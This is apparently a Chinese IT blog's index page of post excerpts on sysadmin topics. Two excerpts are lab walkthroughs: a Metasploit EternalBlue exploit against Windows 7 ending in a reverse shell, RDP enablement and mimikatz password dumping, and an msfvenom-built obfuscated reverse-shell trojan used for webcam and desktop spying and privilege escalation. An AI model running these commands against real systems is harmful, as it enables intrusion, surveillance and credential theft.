首页
统计信息
友情链接
壁纸
Search
1
【更新】CommentToMail typecho2017&v4.1& Mailer三版本,支持php5.6/7,插件详解
158,010 阅读
2
CentOS 7安装bbr教程
12,764 阅读
3
纯小白10分钟变身linux建站高手?宝塔linux面板全体验
12,363 阅读
4
深信服超融合架构测试介绍
11,592 阅读
5
优秀的个人博客系统,typecho从入门到精通
7,517 阅读
技术相关
ACG相关
胡言乱语
数码杂烩
登录
Search
标签搜索
进击的巨人
漫画
宝塔
php
typecho
diy
vps
折腾
动漫
优酷路由宝
ubuntu
路由器
QQ
KMS
王忘杰
累计撰写
270
篇文章
累计收到
179
条评论
首页
栏目
技术相关
ACG相关
胡言乱语
数码杂烩
页面
统计信息
友情链接
壁纸
搜索到
270
篇与
的结果
2021-04-03
windows域软件下发策略
在我们日常的运维工作中,批量部署软件恐怕是经常遇到的情景,今天分享的是windows域软件分发方式的介绍。域下发静默安装:在企业中,域集中管理是一种很常见的方式,权限的集中管理可以有效的防止客户机乱安装软件、随意下载复制、对系统关键配置修改等。同时,域组策略也提供了批量部署软件的功能。windows域目前仅支持MSI文件的静默安装,如果是EXE的静默安装建议使用第三方软件,因为在实际测试中,无论是exe2msi和Sib转换的msi文件,还是通过脚本加载exe文件,或多或少都会出现问题。本次下发的软件为python和Sib,官方提供了msi安装包,并且支持静默安装。域下发软件其实就两步,第一步,建立msi安装包的共享目录;第二步,设置组策略。1、共享msi安装包共享安装包目录,设置Everyone读取权限。2、设置组策略打开组策略设置默认域策略设置用户配置计算机配置和用户配置其实都可以,建议选择用户,这样该用户无论在哪台机器登录都可以安装同样的软件。软件安装设置右键属性,安装位置、高级、最大添加软件刷新服务器组策略刷新即时生效有利于测试,不刷新会过段时间自动生效。cmd gpupdate /force 软件属性,部署,已分配,在登陆时安装添加everyone用户权限部署完成,客户机登录,在登陆界面停留,后台自动安装软件开始菜单出现最新安装的软件安装完成
2021年04月03日
510 阅读
0 评论
0 点赞
2021-03-23
小型企业安全管理利器,360安全卫士团队版
注意:1、若你不喜欢360系列软件,可以点击作者头像查看其他文章。2、本文仅为简单介绍,如果你产生兴趣,请务必阅读360团队版完整文档。3、为何又推荐360的软件?因为火绒企业版、深信服EDR等企业安全软件均无法免费使用。360团队版功能介绍文档:https://yunpan.360.cn/surl_yRrrj7QZpfU (提取码:f650)管理痛点在小型企业中,IT面临的问题通常如下:1、新购淘汰频繁,对管理的机器没有实时掌控。2、担心硬件被掉包。3、机器各自打补丁,浪费带宽。4、网速慢时,无法第一时间确定原因。5、用户乱安装软件,广告弹窗无数。6、上新系统时只能一台台安装。或许你会说,用windows域或者其他企业安全软件就可以解决,但在小型企业中,企业往往没有严格的规章制度,IT部门的行政规定形同虚设,无法有效执行。如果你也面临以上问题,那么我向你推荐 360安全卫士团队版正如团队版的名字,一开始这款软件针对的就是预算不多,甚至想白嫖的网管们,首次使用赠送30天认证版试用。服务端360团队版并没有独立部署的服务端,而是由360提供了web版控制台,可以在任何有网络的地方登陆控制台进行管理。360团队版控制台主要由以下模块构成总揽360的界面跟深信服EDR很类似,控制台主界面,常用信息显示。服务服务是合约订购信息,个人认为放在前面不是很合适。终端终端里可以管理终端、推送消息、远程桌面、查看硬件信息等。状态状态里可以查看客户端运行情况、软件版本、病毒库版本等信息。安防安防里可以进行木马查杀、360杀毒推送、勒索病毒防御(认证版)、漏洞修复、系统修复等。管控管控里则是一些功能集合,如网络限速、U盘监控、软件管理、软件分发、弹窗过滤、启动项过滤等等。日志日志里是任务运行的一些记录情况。设置设置里可以轻微定制软件外观。客户端客户端有多种安装方式,普通360卫士也可以直接切换成团队版。最后如果你使用过深信服EDR,你肯定会觉得360团队版是如此简陋,甚至连一键生成报告都没有。但如果你是仅有几十台电脑的小公司,你又会对深信服EDR的复杂和价格望而却步。360免费杀毒是杀毒市场的搅局者,也是破局者,曾经作为360子公司的奇安信在企业安全也打下了大片江山,随着360与奇安信分家,360在企业领域仅仅剩下了360安全卫士单一软件,360团队版是360对企业安全领域的探路石,那个颠覆市场的免费杀毒软件企业版,他来了!
2021年03月23日
380 阅读
0 评论
1 点赞
2021-03-23
网站迁移记录,附linux服务器面板AppNode推荐
如果您恰好在近半个月内访问过本博客,您可能会发现,博客访问速度缓慢,很遗憾,我用了两年多的bandwagonhost的VPS被墙了。而被封原因或可能为在VPS上搭建的翻墙服务,虽然仅为查询外网资料用,但仍触发了防火墙,通常被封IP会在几天至几个月内恢复,若您无法打开本博客,可百度搜索“9s博客”或“王忘杰”,找到本人在各大媒体的自媒体平台,因平台规则不同,某些文章可能不会被发布。我在bandwagonhost购买的VPS为2018双十一促销版,配置高(2h2g40gKVM)价格低(年付29.9美元),在IP被封后搬迁到俄罗斯主机商justhost,可以点击此处查看优惠,当前配置为1h512M5GKVM,月付11元。本次迁移主要涉及以下项目:环境搭建数据库迁移网站主体迁移备份设置伪静态设置HTTPS证书设置其他设置环境搭建为方便管理,同时在快捷与安全中做出折中选择,本站选择了appnode作为服务器管理程序。系统为Centos7,网站套件为nginx开发版、php7.4、MariaDB10.2,网站程序为typecho。一键安装命令:INSTALL_AGENT=1 INSTALL_APPS=sitemgr INIT_SWAPFILE=1 INSTALL_PKGS='nginx-mainline,php74,mariadb102' bash -c "$(curl -sS http://dl.appnode.com/install.sh)" 安装后可设置面板用户名、密码等信息,默认管理端口为8888,登陆面板后可按提示进行网站部署操作。提示:appnode可以连接到另一台服务器的appnode面板中,因此本站能够在被封后,通过justhost面板连接到bandwagonhost面板,直接对数据进行操作,非常方便。数据库迁移appnode网站管理中可以直接对数据库进行导入导出网站主体迁移appnode网站管理中可以直接对目录打包上传下载注意!建议使用随机的mysql密码,注意修改typecho配置文件config.inc.php中的数据库用户名、数据库名、密码等信息。备份设置appnode网站管理可以设置备份,通常为每周一次,同时备份到阿里云oss注意!若你硬盘空间很小,则要减少本地备份的留存时间,防止存储空间满导致出问题。伪静态设置在appnode网站管理中可以直接设置typecho的伪静态参数HTTPS证书设置在appnode网站管理中可以直接设置https跳转、Let's证书、自动续约其他设置可在防火墙设置中开放关闭端口、禁止ping,通过系统信息修改北京时区等。遇到的问题:1、图片上传失败图片采用post方式上传,而默认post_max_size为1M,改大即可。2、网站目录权限修改appnode默认的web用户为www,将网站目录更改为www用户/组即可。安全提示:默认的文件夹权限为755,但typecho并非必须用755权限,通常仅上传目录需要写入,部分插件也需要写入权限,严格控制权限可提高安全性。最后为什么使用面板?若你早期关注过本博客,你会发现,我曾是面板的坚决反对者,在心脏滴血漏洞爆发时,我编译openssl组件;php漏洞爆发时,我编译php;php7测试版发布时,我编译了php7和hhvm并进行了比较;http2刚发布时,我编译了nginx和tengine;为了提高安全性,我也编译了云锁和安全狗的web组件。我是技术的追新者,但我也沮丧的发现,我无法一直追新,让组件保持最新需要很大的精力,所以我开始寻找服务器面板,而大部分面板都太好用了;这里并非贬义,对新手来说,好用就是好用,但对另外一些人来说,好用意味着掩盖细节,我无法了解服务器运行的细节,也无法掌控服务器;而appnode则是一个异类,他并不太好用,设置有些繁琐,却又完全符合运维操作顺序,从不掩饰细节;若你也对linux运维感兴趣,或许也可以试一下这个面板,说不定你会喜欢呢~
2021年03月23日
391 阅读
0 评论
0 点赞
2021-03-17
Metasploit MS17-010永恒之蓝攻击演示
kaliLinux内置了非常多优秀的安全软件,本文演示的是如何利用MS17-010漏洞,通过nmap和MSF完成发现、扫描、攻击、登录的相关操作。相关软件:windows7操作系统(启用文件共享)、Kalilinux操作系统一、发现查看本机IP$ ifconfig eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 10.0.0.112 netmask 255.255.255.0 broadcast 10.0.0.255 对10.0.0.0/24网段进行深层扫描,确认开放445段口$ nmap -Pn 10.0.0.0/24 Nmap scan report for tnt-PC (10.0.0.221) Host is up (0.0012s latency). Not shown: 996 filtered ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 5357/tcp open wsdapi 切换到root账户sudo su (root????kali)#: 二、扫描启动msf# msfconsole IIIIII dTb.dTb _.---._ II 4' v 'B .'"".'/|\`.""'. II 6. .P : .' / | \ `. : II 'T;. .;P' '.' / | \ `.' II 'T; ;P' `. / | \ .' IIIIII 'YvP' `-.__|__.-' I love shells --egypt =[ metasploit v6.0.30-dev ] + -- --=[ 2099 exploits - 1129 auxiliary - 357 post ] + -- --=[ 592 payloads - 45 encoders - 10 nops ] + -- --=[ 7 evasion ] Metasploit tip: Display the Framework log using the log command, learn more with help log msf6 > 装载EXPmsf6 > use auxiliary/scanner/smb/smb_ms17_010 msf6 auxiliary(scanner/smb/smb_ms17_010) > 设置目标IPmsf6 auxiliary(scanner/smb/smb_ms17_010) > set RhOSTS 10.0.0.221 RhOSTS => 10.0.0.221 扫描发现漏洞msf6 auxiliary(scanner/smb/smb_ms17_010) > run [+] 10.0.0.221:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit) [*] 10.0.0.221:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed 三、攻击装载攻击模块msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.0.0.221 rhosts => 10.0.0.221 msf6 exploit(windows/smb/ms17_010_eternalblue) > set LhOST 10.0.0.112 LhOST => 10.0.0.112 msf6 exploit(windows/smb/ms17_010_eternalblue) > set LpORT 444 LpORT => 444 msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/smb/ms17_010_eternalblue) > 攻击msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit [*] Started reverse TCP handler on 10.0.0.112:444 [*] 10.0.0.221:445 - Executing automatic check (disable AutoCheck to override) [*] 10.0.0.221:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 10.0.0.221:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit) [*] 10.0.0.221:445 - Scanned 1 of 1 hosts (100% complete) [+] 10.0.0.221:445 - The target is vulnerable. [*] 10.0.0.221:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 10.0.0.221:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit) [*] 10.0.0.221:445 - Scanned 1 of 1 hosts (100% complete) [*] 10.0.0.221:445 - Connecting to target for exploitation. [+] 10.0.0.221:445 - Connection established for exploitation. [+] 10.0.0.221:445 - Target OS selected valid for OS indicated by SMB reply [*] 10.0.0.221:445 - CORE raw buffer dump (38 bytes) [*] 10.0.0.221:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima [*] 10.0.0.221:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service [*] 10.0.0.221:445 - 0x00000020 50 61 63 6b 20 31 Pack 1 [+] 10.0.0.221:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 10.0.0.221:445 - Trying exploit with 12 Groom Allocations. [*] 10.0.0.221:445 - Sending all but last fragment of exploit packet [*] 10.0.0.221:445 - Starting non-paged pool grooming [+] 10.0.0.221:445 - Sending SMBv2 buffers [+] 10.0.0.221:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 10.0.0.221:445 - Sending final SMBv2 buffers. [*] 10.0.0.221:445 - Sending last fragment of exploit packet! [*] 10.0.0.221:445 - Receiving response from exploit packet [+] 10.0.0.221:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 10.0.0.221:445 - Sending egg to corrupted connection. [*] 10.0.0.221:445 - Triggering free of corrupted buffer. [*] Sending stage (200262 bytes) to 10.0.0.221 [*] Meterpreter session 1 opened (10.0.0.112:444 -> 10.0.0.221:49162) at 2021-03-17 20:46:36 +0800 [+] 10.0.0.221:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 10.0.0.221:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 10.0.0.221:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 攻击成功,查看系统信息meterpreter > sysinfo Computer : TNT-PC OS : Windows 7 (6.1 Build 7601, Service Pack 1). Architecture : x64 System Language : zh_CN Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows meterpreter > 查看系统截图meterpreter > screenshot Screenshot saved to: /home/tnt/桌面/OHtgaYJN.jpeg 开启3389端口,打开防火墙端口meterpreter > shell Process 876 created. Channel 2 created. C:\Windows\system32>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f netsh advfirewall firewall add rule name="2346p" protocol=TCP dir=in localport=2346 action=allow C:\Windows\system32>netstat -an netstat -an TCP 0.0.0.0:135 0.0.0.0:0 LISTENING TCP 0.0.0.0:445 0.0.0.0:0 LISTENING TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 获取系统密码meterpreter > load mimikatz meterpreter > creds_wdigest [+] Running as SYSTEM [*] Retrieving wdigest credentials wdigest credentials =================== Username Domain Password -------- ------ -------- (null) (null) (null) TNT-PC$ WORKGROUP (null) tnt tnt-PC tnt 三、登录通过远程登陆连接目标,演示完成(可通过软件破解实现win7系统双开3389)rdesktop 10.0.0.221 最后通常在做安全测试时不会登录对方系统,而是留下木马或建立隐匿账户。本文仅是一次攻击演示,请勿在真实环境下进行,后果自负。
2021年03月17日
527 阅读
0 评论
2 点赞
2021-03-17
思科模拟器笔记
本文记录的是使用思科模拟器搭建:思科常用命令ACL访问控制列表vlan隔离+PAT段口多路复用Rip距离矢量内部网关协议单臂路由+NAT复用PAT三层交换SVI+路由器PAT思科常用命令#show version 显示版本号 #running-configuration 显示当前配置 #show interfaces ethernet 0/1 显示接口信息 #show ip 显示交换机IP地址 config#hostname sw1 设置主机名 config#ip address 1.1.1.1 255.255.255.0 配置IP地址 config#ip default-gateway 1.1.1.1 配置缺省网关 config#interface e0/1 config#duplex full 配置全双工模式 #setup 初始化配置 #show startup 显示启动配置 config#line console 0 config-line#login config-line#password cisco 终端密码 config#line vty 0 4 启动5个虚拟终端 config-line#login config-line#password sanjose config#enable password cisco 开启密码 config#enable secret sanfran 特权模式密码 config#interface type number 端口标识 config#interface type slot/port 针对模块交换机 配置串行端口 #configure term config#interface serial 0 config-if#clock rate 64000 设置时钟速率 config-if#bandwidth 64 设置带宽 config-if#shutdown 关闭接口 config-if#no shutdown 开启接口 保存配置 #copy runnig-config startup-config #write #reload 重启 #telnet 1.1.1.1 使用telnet连接到远程设备 #<ctrl-shift-6>x 挂起 #resume 1 恢复 #sh session 查看telnet连接 #sh user 查看登陆的用户 #disconnnect 关闭远程回话 #clear line 11关闭被远程打开的回话 #ip name-server 1.1.1.1 绑定hosts #ping 1.1.1.1 #trace 1.1.1.1 CDP 思科发现协议 PVST+ 思科生成树协议 VTP 思科Vlan同步协议 S1 config#vtp mode server 服务器 S1 config#vtp domain sw 域名 S1 config#vtp password cisco 密码 S2 config#vtp mode client 客户端 S3 config#vtp mode transparent 透明模式 S1 config#interface f0/1 S1 config-if#switchport mode trunk S1 config-if#switchport trunk native vlan 99 S1 config-if#no shutdown config#ip route 1.1.1.1 0.0.0.255 静态路由 config#ip route 0.0.0.0 0.0.0.0 1.1.1.1 默认路由 解决路由环路 定义最大值 水平分割 路由毒化 毒性逆转 抑制计时器 触发更新 RIP协议 config#router rip config-route#network 1.1.1.0 config-route#network 1.1.2.0 直连路由 #show ip protocols 核实rip配置 #sh ip route #debug ip rip IGRP #route igrp 100 #network 1.1.1.0 #network 1.1.2.0 直连路由 EIGRP #router eigrp 100 #network 1.1.1.0 #network 1.1.2.0 直连路由 OSFP config#router ospf 1 config-router#net 1.1.1.0 0.0.0.255 area 0 config-router#net 1.1.2.0 0.0.0.255 area 0 宣告路由 config#router ospf 2 config-router#net 0.0.0.0 255.255.255.255 area 0 宣告所有路由 ACL 标准访问列表 范围从1-99 access-list 1 premit 172.16.0.0 0.0.255.255 允许一个网段 接口方向 f0/0 interface ethernet 0 ip access-group 1 out 允许规则 interface ethernet 1 ip access-group 1 out 允许规则 access-list 1 deny 172.16.4.13 0.0.0.0 拒绝一个主机 access-list 1 permit 0.0.0.0 255.255.255.255 允许其他 接口方向 e0 172.16.3.0 方向out interface ethernet 0 ip access-group 1 out access-list 1 deny 172.16.4.0 0.0.0.255 拒绝一个子网 access-list 1 permit any 允许其他 接口方向 e0 172.16.3.0 方向out interface ethernet 0 ip access-group 1 out 扩展ACL 扩展访问列表 从100-199 access-list 101 deny ecp 172.16.4.0 0.0.0.255 172.16.3.0 0.0.0.255 eq 21 禁止172.16.4.0到172.16.3.0从E0出去的ftp服务 access-list 101 permit ip any any interface ethernet 0 ip access-group 101 out access-list 101 deny tcp 172.16.4.0 0.0.0.255 any eq 23 禁止网络172.16.4.0从e0出去的telnet access-list 101 permit ip any any interface ethernet 0 ip access-group 101 out ACL访问控制列表vlan隔离+PAT段口多路复用SW config#int f0/10 config-if#switchport mode access config-if#switchport access vlan 10 (设置vlan10) config#int f0/11 config-if#switchport mode access config-if#switchport access vlan 20 (设置vlan20) config#ip routing (启用路由模式) config#int vlan 10 config-if#ip address 10.0.1.1 255.255.255.0 config-if#no shutdown (启用vlan10 SVI) config#int vlan 20 config-if#ip address 10.0.2.1 255.255.255.0 config-if#no shutdown (启用vlan20 SVI) PC IP 掩码 网关 SW(ACL vlan20隔离 其余通讯) Switch(config)#access-list 100 deny ip 10.0.2.0 0.0.0.255 10.0.1.0 0.0.0.255 (屏蔽从1.0到2.0网段的通讯 在1.0网段上是in方向) Switch(config)#access-list 100 deny ip 10.0.2.0 0.0.0.255 10.0.3.0 0.0.0.255 Switch(config)#access-list 100 permit ip any any (允许其他) Switch(config)#int vlan 20 (2.0网段是vlan20) Switch(config-if)#ip access-group 100 in (加载规则) RT config#int f0/0 config-if#ip address 1.1.1.1 255.255.255.0 config-if#no shutdown (外网设置) config#int f0/1 config-if#ip address 10.0.0.1 255.255.255.0 config-if#no shutdown (内网设置) SW config#int f0/1 config-if#no switchport config-if#ip address 10.0.0.2 255.255.255.0 (三层交换启用接口) config#ip route 0.0.0.0 0.0.0.0 10.0.0.1 (三层交换配置静态路由) RT config#ip route 10.0.0.0 255.255.0.0 10.0.0.2 (路由器配置静态路由) config#access-list 1 permit 10.0.0.0 0.0.255.255 config#ip nat in so list 1 int f0/0 overload config#int f0/0 config-if#ip nat outside config#int f0/1 config-if#ip nat inside (路由器配置NAT) Rip距离矢量内部网关协议rip V1 int f0/0 ip add 1.1.1.1 255.255.255.0 no sh int f0/1 ip add 1.1.2.1 255.255.255.0 no sh exit router rip network 1.1.1.0 network 1.1.2.0 rip V2 int f0/0ip add 1.1.1.1 255.255.255.0no shint f0/1ip add 1.1.2.1 255.255.255.0no shexitrouter ripversion 2no auto-summarynetwork 1.1.1.0network 1.1.2.0单臂路由+NAT复用PAT交换机 Switch>en Switch#conf t Switch(config)#interface f0/10 Switch(config-if)#switchport mode access Switch(config-if)#switchport access vlan 10 Switch(config-if)#no shutdown Switch#conf t Switch(config)#interface f0/11 Switch(config-if)#switchport mode access Switch(config-if)#switchport access vlan 20 Switch(config-if)#no shutdown Switch(config)#interface f0/1 Switch(config-if)#switchport mode trunk Switch(config-if)#no shutdown 路由器 Router(config)#interface f0/0 Router(config-if)#no shutdown Router(config)#interface f0/0.10 Router(config-subif)#encapsulation dot1Q 10 Router(config)#interface f0/0.20 Router(config-subif)#encapsulation dot1Q 20 Router(config-subif)#ip address 172.16.20.1 255.255.255.0 Router#wr 客户端 ping NAT复用pat router(config)#int f0/0 router(config-if)#ip add 1.1.1.1 255.0.0.0 (设置外部端口ip) router(config-if)#int f0/0.10 (vlan) router(config-if)#ip add 192.168.10.1 255.255.255.0 (设置内部端口ip) router(config)#access-list 1 permit 192.168.1.0 0.0.0.255 (定义acl或any全局) router(config)#ip nat in so list 1 int f0/0 overload (配置复用路由器外部端口地址转换) router(config)#int f0/0 router(config-if)#ip nat outside router(config-if)#int f0/1 router(config-if)#ip nat inside (在内部和外部端口启用nat) router(config)#ip route 0.0.0.0 0.0.0.0 gateway-ip (配置默认路由,保证数据包正常选路路由,这里gateway通过isp下发配置) 三层交换SVI+路由器PATSW config#int f0/10 config-if#switchport mode access config-if#switchport access vlan 10 (设置vlan10) config#int f0/11 config-if#switchport mode access config-if#switchport access vlan 20 (设置vlan20) config#ip routing (启用路由模式) config#int vlan 10 config-if#ip address 10.0.1.1 255.255.255.0 config-if#no shutdown (启用vlan10 SVI) config#int vlan 20 config-if#ip address 10.0.2.1 255.255.255.0 config-if#no shutdown (启用vlan20 SVI) PC IP 掩码 网关 RT config#int f0/0 config-if#ip address 1.1.1.1 255.255.255.0 config-if#no shutdown (外网设置) config#int f0/1 config-if#ip address 10.0.0.1 255.255.255.0 config-if#no shutdown (内网设置) SW config#int f0/1 config-if#no switchport config-if#ip address 10.0.0.2 255.255.255.0 (三层交换启用接口) config#ip route 0.0.0.0 0.0.0.0 10.0.0.1 (三层交换配置静态路由) RT config#ip route 10.0.0.0 255.255.0.0 10.0.0.2 (路由器配置静态路由) config#access-list 1 permit 10.0.0.0 0.0.255.255 config#ip nat in so list 1 int f0/0 overload config#int f0/0 config-if#ip nat outside config#int f0/1 config-if#ip nat inside (路由器配置NAT)
2021年03月17日
509 阅读
0 评论
0 点赞
2021-03-17
深信服超融合架构测试介绍
简介深信服超融合本质是基于KVM的虚拟机控制器,主要由服务器虚拟化、网络虚拟化、存储虚拟化、网络功能虚拟化四部分组成,结构清晰,使用简单,包含HA(高可用,自动重启异常虚拟机),在线热迁移(vMotion)特性,但并无FT(容错保护,0宕机)等高级特性。环境介绍深信服超融合采用类EXSI架构,需要在服务器安装独立操作系统,本次测试使用的IP为192.168.12.64 192.168.12.66,控制台虚拟IP为192.168.12.62,控制台实际运行在主控机上,当主控机关闭时,其他主机会接替主控机职务。整体界面,由于深信服超融合本质为KVM控制器,所以在控制界面依然体现物理服务器资源占用率。功能介绍在创建虚拟机的方式上,与桌面级应用vmpro并无区别,依旧分为新建、克隆、导入,同时增加了Oracle,SQL Server数据库的快速创建方式,但用处基本不大,比直接在系统中安装数据库没有什么特别的优势。在虚拟机导入中,支持OVA(Open Virtualization Appliance:开放虚拟化设备)标准虚拟机和vma深信服私有虚拟机。新建虚拟机页面简单易懂数据保护方面,深信服提供了两种备份方案,同时硬件本身也通过raid方式保护。定时备份CDP实时数据备份,但深信服依然有备份时间间隔,备份文件支持备份到共享存储(共享文件夹)。从显示的内容看起来为增量备份方案物理机迁移功能与VMware vCenter Converter:P2V 虚拟机转换器使用方法相同。添加超融合物理机也很简单,仅需要安装类似esxi的超融合系统即可。存储器支持iscsi(互联网小型计算机系统接口)、FC(光纤通道)、本地三种方式,虚拟机管理上与本地运行虚拟机并无太大区别,在关闭HA时,虚拟机仅运行在各自的物理服务器上。深信服超融合的一个优势是支持添加超融合设备,比如行为管理、入侵检测等,但需要额外付费,同时这些设备也会占用相应的资源。网络拓扑上实现了鼠标拖动连接,更直观简单。虚拟网络板块可以对添加的超融合设备进行设置在硬raid的情况下服务器中的系统并不能接收到raid状态。从这里能看出来,超融合采用的是软raid,超融合系统安装在ssd中占用了一块空间,同时另外两块硬盘组成raid并且加入剩余ssd空间当作缓存,同时两台机器组成分布式存储,确保存储数据的一致。实体机设置实体机存储块设置更多功能,通常都是充数的。虚拟机详情虚拟机控制台以上就是深信服超融合架构的简单介绍,接下来我们分析一下深信服超融合的优缺点。优点全中文web界面,使用简单,向导功能清晰,简单配置即可使用。支持HA高可用。网络拓扑鼠标操作,支持添加深信服设备。缺点无FT高级特性,不能实现0宕机。包装过度,蜜汁特效,莫名其妙的卡顿。系统安装在ssd中,同时ssd又是缓存盘,由于ssd是pe(耗损资源抚平次数)次数计算寿命,而超融合本身又是软raid,超融合系统崩溃时,无法恢复数据,只能使用其他超融合物理机上的分布式备份。分布式存储高度依赖网络同步数据,当写入速度超过网络速度会出现不可预知的问题。网络功能添加,例如深信服行为管理,既要付费购买,又要占用超融合资源,同时又只能应用在超融合架构里,鸡肋。在服务器硬件较为可靠的今天,通常服务器损坏都是硬盘故障,在raid10保护的单机可用性上,甚至不如VMware提供的免费版vSphere Hypervisor。
2021年03月17日
11,592 阅读
0 评论
4 点赞
2021-03-17
Meterpreter(MSF)payload攻击载荷,反弹实验。
制作木马攻击载荷的概念类似反弹shell,使用msfvenom -v可以查看操作帮助msfvenom -l可以查看当前可以使用的攻击载荷列表生成一个反弹木马msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.136.131 lport=666 -f exe -e x86/shikata_ga_nai -i 8 -o muma2.exe -p windows/meterpreter/reverse_tcp使用反弹模式 lhost=192.168.136.131我的IP lport=666我要监听的端口 -f exe生成exe文件 -e x86/shikata_ga_nai编码混淆方式 -i 8编码混淆次数 -o muma.exe生成的文件 当然,简单的编码混淆是过不了杀毒软件的。本地监听进入监听模式msf > use exploit/multi/handler 监听的payload类型msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp 监听的IPmsf exploit(multi/handler) > set lhost 192.168.136.131 lhost => 192.168.136.131 监听的端口msf exploit(multi/handler) > set lport 666 lport => 444 开始监听msf exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.136.131:444 [*] Sending stage (179779 bytes) to 192.168.136.133 主机上线[*] Meterpreter session 1 opened (192.168.136.131:444 -> 192.168.136.133:1027) at 2018-05-05 20:10:43 +0800 VNC桌面实时监控meterpreter > run vnc Connected to RFB server, using protocol version 3.8 Enabling TightVNC protocol extensions No authentication needed Authentication successful Desktop name "www-a8d99aa2ea1" 查看在线的摄像头meterpreter > webcam_list 1: 实时监控摄像头meterpreter > webcam_stream [*] Starting... [*] Preparing player... [*] Opening player at: ebSRJuzI.html 查看系统信息meterpreter > sysinfo Computer : WWW-A8D99AA2EA1 OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : zh_CN Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows 查看当前权限meterpreter > getuid Server username: WWW-A8D99AA2EA1\Administrator 权限提升meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM 完毕以上就是Meterpreter(MSF)payload攻击载荷的简单反弹实验,msf作为大型攻击框架,实际上可以攻击安卓、web系统、linux等等,帮助文档也比较详细,英文基础好上手毫无压力。
2021年03月17日
2,770 阅读
1 评论
0 点赞
2021-03-17
瑞友天翼应用虚拟化,企业远程办公,盗版软件规避的得力助手。
简介瑞友天翼应用虚拟化系统(GWT System)是国内具有自主知识产权的应用虚拟化平台,是基于服务器计算(Server-based Computing)的应用虚拟化平台。它将用户所有应用软件(ERP、OA、CRM、PDM、CAD……)集中部署在天翼服务器(群)上,客户端通过WEB即可快速安全的访问经服务器上授权的应用软件,实现集中应用、远程接入、协同办公等,从而为用户打造集中、便捷、安全、高效的虚拟化支撑平台。操作终端无需再安装应用程序,通过天翼独特的RAP 协议(Remote Application Protocol),即可让用户快速访问服务器上的各类应用软件;天翼RAP 协议只传输鼠标、键盘及屏幕变化的矢量数据,访问仅需3KB/s(20kbps)的带宽,用户不再受客户端和连接性能要求的限制,在任何时间、任何地点,利用任何设备、任何网络连接方式,即可高效安全地访问服务器(群)上的应用程序和关键资源。企业痛点远程办公使用繁琐,比如仅使用金蝶,却需要VPN之类的远程连接手段。本地电脑配置不高,需要画图,又不想升级配置。购买了几套正版软件,但需要使用的人很多。都可以用应用虚拟化解决。下面我以浩辰CAD为例。下载http://soft.realor.cn/Gwt6.0.exe安装默认勾选即可默认即可设置密码设置web端口安装完成务必重启部署CAD,不再赘述。瑞友天翼主界面添加用户发布应用画图程序务必使用32位色彩,金蝶之类可以用16位速度更快。根据情况选择映射方式,推荐映射桌面和我的文档,局域网可以考虑不使用加密,速度更快。完成客户端使用登陆IP,首次使用需要安装客户端。不需要桌面图标和开机自启动再次登陆,注意允许瑞友天翼插件运行。运行CAD对于CAD来说,它相当于装在本地电脑上,路径映射正常。完毕
2021年03月17日
3,421 阅读
0 评论
0 点赞
2021-03-17
服务器运维之,centos忘记root密码怎么办,重置root密码,单用户模式
在grub选项菜单按e进入编辑模式编辑第二行,kernel那行 最后加上 1回车,按B引导进入进入后执行下列命令root@#passwd root (配置root的密码) Enter new unix password:输入新的密码 重启root@#init 6 完成
2021年03月17日
376 阅读
0 评论
0 点赞
2021-03-17
centos6 私有云owncloud8搭建,建立虚拟机主机,启用https,用户管理
什么叫私有云?我们都知道百度网盘,我们可以上传下载编辑分享。而私有云,就是私人的网盘私有云可以做什么?企业内,可以通过私有云同步数据,防止因为客户机宕机而造成数据丢失个人用户,私有云可以有效的在多平台同步隐私数据,例如家庭照片,录像等等
2021年03月17日
270 阅读
0 评论
0 点赞
2021-03-17
服务器安全之,隐藏端口,更改mysql端口,更改ssh端口
